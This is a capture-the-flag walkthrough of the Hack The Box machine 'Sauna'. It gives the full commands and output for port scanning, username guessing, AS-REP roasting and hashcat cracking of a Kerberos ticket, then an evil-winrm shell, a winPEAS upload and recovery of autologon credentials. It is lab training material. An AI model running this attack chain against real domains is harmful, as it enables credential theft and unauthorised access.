Sauna
Port scan
u505@naos:~/HTB/Machines/Sauna$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.175
Starting masscan 1.0.5 at 2020-12-28 15:15:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 389/tcp on 10.10.10.175 Discovered open port 49675/tcp on 10.10.10.175 Discovered open port 139/tcp on 10.10.10.175 Discovered open port 49667/tcp on 10.10.10.175 Discovered open port 636/tcp on 10.10.10.175 Discovered open port 445/tcp on 10.10.10.175 Discovered open port 49674/tcp on 10.10.10.175 Discovered open port 464/tcp on 10.10.10.175 Discovered open port 9389/tcp on 10.10.10.175 Discovered open port 49673/tcp on 10.10.10.175 Discovered open port 56995/tcp on 10.10.10.175 Discovered open port 49686/tcp on 10.10.10.175 Discovered open port 3268/tcp on 10.10.10.175 Discovered open port 5985/tcp on 10.10.10.175 Discovered open port 88/tcp on 10.10.10.175 Discovered open port 135/tcp on 10.10.10.175 Discovered open port 3269/tcp on 10.10.10.175 Discovered open port 53/tcp on 10.10.10.175 Discovered open port 80/tcp on 10.10.10.175 Discovered open port 593/tcp on 10.10.10.175
u505@naos:~$ nmap -sC -sV sauna Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 10:15 EST Nmap scan report for sauna (10.10.10.175) Host is up (0.038s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-28 23:23:57Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 8h08m05s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-12-28T23:24:00 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.86 seconds
Nmap discovers a web server, Kerberos and Active directory.
u505@naos:~$ cat ports | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port > do > printf $port"," > done 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49686,56995,
We list all ports and execute a thoughtful scan of these ports.
u505@naos:~$ nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49686,56995 -sC -sV sauna Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 10:22 EST Nmap scan report for sauna (10.10.10.175) Host is up (0.038s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-28 23:30:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49686/tcp open msrpc Microsoft Windows RPC 56995/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 8h08m05s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-12-28T23:31:38 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 95.92 seconds
This second scan discovers the WinRM (Windows Remote management) listening. evil-winrm? :)
Web enumeration
Dirsearch
The web enumeration doesn't provide too much information.
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,js" -f -t 1000 -u http://10.10.10.175
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html, js | HTTP method: GET | Threads: 1000 | Wordlist size: 1102600
Error Log: /opt/utils/dirsearch/logs/errors-20-12-28_22-04-47.log
Target: http://10.10.10.175/
Output File: /opt/utils/dirsearch/reports/10.10.10.175/_20-12-28_22-04-47.txt
[22:04:47] Starting: [22:04:48] 200 - 5KB - /index.html [22:04:49] 200 - 30KB - /about.html [22:04:49] 403 - 1KB - /images/ [22:04:49] 200 - 24KB - /blog.html [22:04:49] 200 - 15KB - /contact.html [22:04:49] 403 - 1KB - /Images/ [22:04:49] 301 - 150B - /Images -> http://10.10.10.175/Images/ [22:04:49] 301 - 150B - /images -> http://10.10.10.175/images/ [22:04:52] 301 - 147B - /css -> http://10.10.10.175/css/ [22:04:52] 403 - 1KB - /css/ [22:04:52] 200 - 15KB - /Contact.html [22:04:52] 200 - 30KB - /About.html [22:04:53] 200 - 5KB - /Index.html [22:04:56] 200 - 24KB - /Blog.html [22:05:17] 301 - 149B - /fonts -> http://10.10.10.175/fonts/ [22:05:17] 403 - 1KB - /fonts/ [22:05:28] 301 - 150B - /IMAGES -> http://10.10.10.175/IMAGES/ [22:05:28] 403 - 1KB - /IMAGES/ [22:05:45] 200 - 5KB - /INDEX.html [22:05:51] 301 - 149B - /Fonts -> http://10.10.10.175/Fonts/ [22:05:51] 403 - 1KB - /Fonts/ [22:06:02] 200 - 37KB - /single.html [22:06:25] 301 - 147B - /CSS -> http://10.10.10.175/CSS/ [22:06:25] 403 - 1KB - /CSS/ [22:09:13] 200 - 15KB - /CONTACT.html [22:14:11] 200 - 30KB - /ABOUT.html
Task Completed
Page hints
In the home page, the sentence get a ticket to roast let us guess that the box is vulnerable at a Kerberos roasting attack.
The page about provides a second hint with a list of possible users.
Kerberos roasting
Anonymous enumeration
The anonymous enumeration doesn't provide information except the domain name (already listed by nmap) and that the port winrm is responsive (already discovered by nmap too).
u505@naos:~/HTB/Machines/Sauna$ smbmap -H 10.10.10.175 [+] IP: 10.10.10.175:445 Name: sauna
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
u505@naos:~/HTB/Machines/Sauna$ crackmapexec winrm 10.10.10.175/32 WINRM 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) WINRM 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
Obtain token and username
From the web page, we create a user list.
u505@naos:~/HTB/Machines/Sauna$ cat userslist Fergus Smith Shaun Coins Hugo Bear Bowie Taylor Sophie Driver Steven Kerb
We manipulate the list of users to obtain the possible logins. Adding he user administrator and the user u505, I have an example of an existing user and one who doesn't exist.
u505@naos:~/HTB/Machines/Sauna$ cat usercreation.awk
BEGIN{
print "administrator"
print "u505"
}
{
first=tolower($1)
last=tolower($2)
print first""last
print first"."last
print substr(first,1,1)"."last
print substr(first,1,1)last
print last"."substr(first,1,1)
print last""substr(first,1,1)
}
u505@naos:~/HTB/Machines/Sauna$ awk -f usercreation.awk userslist > userroast u505@naos:~/HTB/Machines/Sauna$ cat userroast administrator u505 fergussmith fergus.smith f.smith fsmith smith.f smithf shauncoins shaun.coins s.coins ... skerb kerb.s kerbs
In a loops, we try to get the TGT of our logins.
u505@naos:~/HTB/Machines/Sauna$ cat userroast | while read user > do > python3 /opt/utils/impacket/examples/GetNPUsers.py -no-pass EGOTISTICAL-BANK.LOCAL/$user > done Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for administrator [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for u505 [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for fergussmith [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for fergus.smith [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for f.smith [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for fsmith $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$f05bf9551daf1589b2c1526484812f34b01683283c73db1720460e210e6e03132c507fc3a02bd50eb8271005ed7cb8f53e8b942d672f5d14fd0b02d88a0fd04999f6548944d64b208b4bdc4843ed4fc3eb4b7e6049df6b168268bcc79c0928925733a220b50c0353a83d911ca1b7ac402b40626139202b5af8213078db3c81740b10b4e35c93083a8297a12f714dafbad9e6325b3577d3a43713c39424dcd3184a12a2fa8b739b97f3f44d329ef5f2dba52568325860c09e881e8940b1c61510e5c737fc3833c0545ac3462ad052c36e68c0927b92eb03e340ff8b7a8ff332dbf7aa7db9d283d4b0a80cdaf3e25e150711b13a1abb6dc54f7778398596fdfb3f Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for smith.f [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for smithf [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for shauncoins [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for shaun.coins [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for s.coins [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ... [*] Getting TGT for skerb [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for kerb.s [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for kerbs [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
We obtain the ticket and the login fsmith
Crack kerberos ticket
We copy the ticket to a file.
u505@naos:~/HTB/Machines/Sauna$ cat TGTfsmith $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$f05bf9551daf1589b2c1526484812f34b01683283c73db1720460e210e6e03132c507fc3a02bd50eb8271005ed7cb8f53e8b942d672f5d14fd0b02d88a0fd04999f6548944d64b208b4bdc4843ed4fc3eb4b7e6049df6b168268bcc79c0928925733a220b50c0353a83d911ca1b7ac402b40626139202b5af8213078db3c81740b10b4e35c93083a8297a12f714dafbad9e6325b3577d3a43713c39424dcd3184a12a2fa8b739b97f3f44d329ef5f2dba52568325860c09e881e8940b1c61510e5c737fc3833c0545ac3462ad052c36e68c0927b92eb03e340ff8b7a8ff332dbf7aa7db9d283d4b0a80cdaf3e25e150711b13a1abb6dc54f7778398596fdfb3f
Search the correct hashcat mode.
u505@naos:~/HTB/Machines/Sauna$ hashcat --example-hashes | grep -A1 -B 2 Kerberos
MODE: 7500 TYPE: Kerberos 5, etype 23, AS-REQ Pre-Auth HASH: $krb5pa$23$user$realm$salt$5cbb0c882a2b26956e81644edbdb746326f4f5f0e947144fb3095dffe4b4b03e854fc1d631323632303636373330383333353630 --
MODE: 13100 TYPE: Kerberos 5, etype 23, TGS-REP HASH: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694ae018d7ad63c257af7dc$35e8e45658860bc31a859b41a08989265f4ef8afd75652ab4d7a30ef151bf6350d879ae189a8cb769e01fa573c6315232b37e4bcad9105520640a781e5fd85c09615e78267e494f433f067cc6958200a82f70627ce0eebc2ac445729c2a8a0255dc3ede2c4973d2d93ac8c1a56b26444df300cb93045d05ff2326affaa3ae97f5cd866c14b78a459f0933a550e0b6507bf8af27c2391ef69fbdd649dd059a4b9ae2440edd96c82479645ccdb06bae0eead3b7f639178a90cf24d9a --
MODE: 18200 TYPE: Kerberos 5, etype 23, AS-REP HASH: $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac --
MODE: 19600 TYPE: Kerberos 5, etype 17, TGS-REP HASH: $krb5tgs$17$srv_http$synacktiv.local$849e31b3db1c1f203fa20b85$948690f5875125348286ad3346d27b43eaabc71896b620c16de7ddcdbd561628c650c508856a3f574261948b6db4b48332d30536e978046a423ad4368f9a69b4dc4642dab4e0d475d8299be718fd6f98ac85a771b457b2453e78c9411dfce572b19660fe7a5a8246d9b2a91ea2f14d1986ea0a77ecf9b8330bc8fd9ab540bcf46b74c5aa7005cfccd89ec05f66aeab30c6b2bf8595cf6c9a1b68ad885258850c4b1dd9265f270fb2af52fd76c16246df51ea67efc58a65c345686c84e43642febe908a --
MODE: 19700 TYPE: Kerberos 5, etype 18, TGS-REP HASH: $krb5tgs$18$srv_http$synacktiv.local$16ce51f6eba20c8ee534ff8a$57d07b23643a516834795f0c010da8f549b7e65063e5a367ca9240f9b800adad1734df7e7d5dd8307e785de4f40aacf901df41aa6ce695f8619ec579c1fa57ee93661cf402aeef4e3a42e7e3477645d52c09dc72feade03512dffe0df517344f673c63532b790c242cc1d50f4b4b34976cb6e08ab325b3aefb2684262a5ee9faacb14d059754f50553be5bfa5c4c51e833ff2b6ac02c6e5d4c4eb193e27d7dde301bd1ddf480e5e282b8c27ef37b136c8f140b56de105b73adeb1de16232fa1ab5c9f6 --
MODE: 19800 TYPE: Kerberos 5, etype 17, Pre-Auth HASH: $krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333 --
MODE: 19900 TYPE: Kerberos 5, etype 18, Pre-Auth HASH: $krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770
Hashcat runs for 5 seconds before the password is cracked.
u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v6.1.1) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch * Device #2: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 11.1) ==================== * Device #1: GeForce GTX 960M, 1971/2004 MB, 5MCU
OpenCL API (OpenCL 1.2 CUDA 11.1.114) - Platform #1 [NVIDIA Corporation] ======================================================================== * Device #2: GeForce GTX 960M, skipped
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 151 MB
Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$f05bf9551daf1589b2c1526484812f34b01683283c73db1720460e210e6e03132c507fc3a02bd50eb8271005ed7cb8f53e8b942d672f5d14fd0b02d88a0fd04999f6548944d64b208b4bdc4843ed4fc3eb4b7e6049df6b168268bcc79c0928925733a220b50c0353a83d911ca1b7ac402b40626139202b5af8213078db3c81740b10b4e35c93083a8297a12f714dafbad9e6325b3577d3a43713c39424dcd3184a12a2fa8b739b97f3f44d329ef5f2dba52568325860c09e881e8940b1c61510e5c737fc3833c0545ac3462ad052c36e68c0927b92eb03e340ff8b7a8ff332dbf7aa7db9d283d4b0a80cdaf3e25e150711b13a1abb6dc54f7778398596fdfb3f:Thestrokes23
Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d4...fdfb3f Time.Started.....: Mon Dec 28 22:57:52 2020 (3 secs) Time.Estimated...: Mon Dec 28 22:57:55 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 3348.1 kH/s (11.33ms) @ Accel:256 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 10567680/14344384 (73.67%) Rejected.........: 0/10567680 (0.00%) Restore.Point....: 10485760/14344384 (73.10%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: XiaoLing.1215 -> TGVbiyz1 Hardware.Mon.#1..: Temp: 43c Util: 44% Core:1202MHz Mem:2505MHz Bus:16
Started: Mon Dec 28 22:57:51 2020 Stopped: Mon Dec 28 22:57:56 2020
u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:41cb0d465b4732f384dd162d44a0b52a$f05bf9551daf1589b2c1526484812f34b01683283c73db1720460e210e6e03132c507fc3a02bd50eb8271005ed7cb8f53e8b942d672f5d14fd0b02d88a0fd04999f6548944d64b208b4bdc4843ed4fc3eb4b7e6049df6b168268bcc79c0928925733a220b50c0353a83d911ca1b7ac402b40626139202b5af8213078db3c81740b10b4e35c93083a8297a12f714dafbad9e6325b3577d3a43713c39424dcd3184a12a2fa8b739b97f3f44d329ef5f2dba52568325860c09e881e8940b1c61510e5c737fc3833c0545ac3462ad052c36e68c0927b92eb03e340ff8b7a8ff332dbf7aa7db9d283d4b0a80cdaf3e25e150711b13a1abb6dc54f7778398596fdfb3f:Thestrokes23
u505@naos:~/HTB/Machines/Sauna$ hashcat -m 18200 TGTfsmith /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show | cut -d ':' -f 3 Thestrokes23
AD enumeration with user fsmith
crackmapexec confirms the login and password
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u fsmith -p Thestrokes23 SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
The shares listing doesn't give any hint.
u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec smb 10.10.10.175/32 -u fsmith -p Thestrokes23 --shares SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 SMB 10.10.10.175 445 SAUNA [+] Enumerated shares SMB 10.10.10.175 445 SAUNA Share Permissions Remark SMB 10.10.10.175 445 SAUNA ----- ----------- ------ SMB 10.10.10.175 445 SAUNA ADMIN$ Remote Admin SMB 10.10.10.175 445 SAUNA C$ Default share SMB 10.10.10.175 445 SAUNA IPC$ READ Remote IPC SMB 10.10.10.175 445 SAUNA NETLOGON READ Logon server share SMB 10.10.10.175 445 SAUNA print$ READ Printer Drivers SMB 10.10.10.175 445 SAUNA RICOH Aficio SP 8300DN PCL 6 We cant print money SMB 10.10.10.175 445 SAUNA SYSVOL READ Logon server share
Listing of all users in the domain.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u 'fsmith' -p Thestrokes23 --rid-brute SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 SMB 10.10.10.175 445 SAUNA [+] Brute forcing RIDs SMB 10.10.10.175 445 SAUNA 498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 500: EGOTISTICALBANK\Administrator (SidTypeUser) SMB 10.10.10.175 445 SAUNA 501: EGOTISTICALBANK\Guest (SidTypeUser) SMB 10.10.10.175 445 SAUNA 502: EGOTISTICALBANK\krbtgt (SidTypeUser) SMB 10.10.10.175 445 SAUNA 512: EGOTISTICALBANK\Domain Admins (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 513: EGOTISTICALBANK\Domain Users (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 514: EGOTISTICALBANK\Domain Guests (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 515: EGOTISTICALBANK\Domain Computers (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias) SMB 10.10.10.175 445 SAUNA 518: EGOTISTICALBANK\Schema Admins (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 525: EGOTISTICALBANK\Protected Users (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 526: EGOTISTICALBANK\Key Admins (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias) SMB 10.10.10.175 445 SAUNA 571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.10.175 445 SAUNA 572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.10.175 445 SAUNA 1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser) SMB 10.10.10.175 445 SAUNA 1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias) SMB 10.10.10.175 445 SAUNA 1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup) SMB 10.10.10.175 445 SAUNA 1103: EGOTISTICALBANK\HSmith (SidTypeUser) SMB 10.10.10.175 445 SAUNA 1105: EGOTISTICALBANK\FSmith (SidTypeUser) SMB 10.10.10.175 445 SAUNA 1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
And as guessed before, the user fsmith has access via winrm :)
u505@naos:~/HTB/Machines/Sauna$ crackmapexec winrm 10.10.10.175/32 -u fsmith -p Thestrokes23 WINRM 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) WINRM 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
User flag
u505@naos:~/HTB/Machines/Sauna$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt <USER_FLAG>
Privilege escalation
Privilege escalation awesome scripts
After taking a look for a while I uploaded WinPEAS top the box via evil-winrm
u505@naos:~/HTB/Machines/Sauna$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./
From the Evil-WinRM terminal
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winPEAS.exe Info: Uploading winPEAS.exe to C:\Users\FSmith\Documents\winPEAS.exe
Data: 629416 bytes of 629416 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEAS.exe ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Creating Dynamic lists, this could take a while, please wait... - Checking if domain... - Getting Win32_UserAccount info... ... [+] Home folders found C:\Users\Administrator C:\Users\All Users C:\Users\Default C:\Users\Default User C:\Users\FSmith : FSmith [AllAccess] C:\Users\Public C:\Users\svc_loanmgr
[+] Looking for AutoLogon credentials Some AutoLogon credentials were found!! DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround! ...
WinPEAS found autologon credentials.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u svc_loanmanager -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
But these credential fails. The user svc_loanmanager doesn't exist. But user svc_loanmgr exists.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!' SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
And it works.
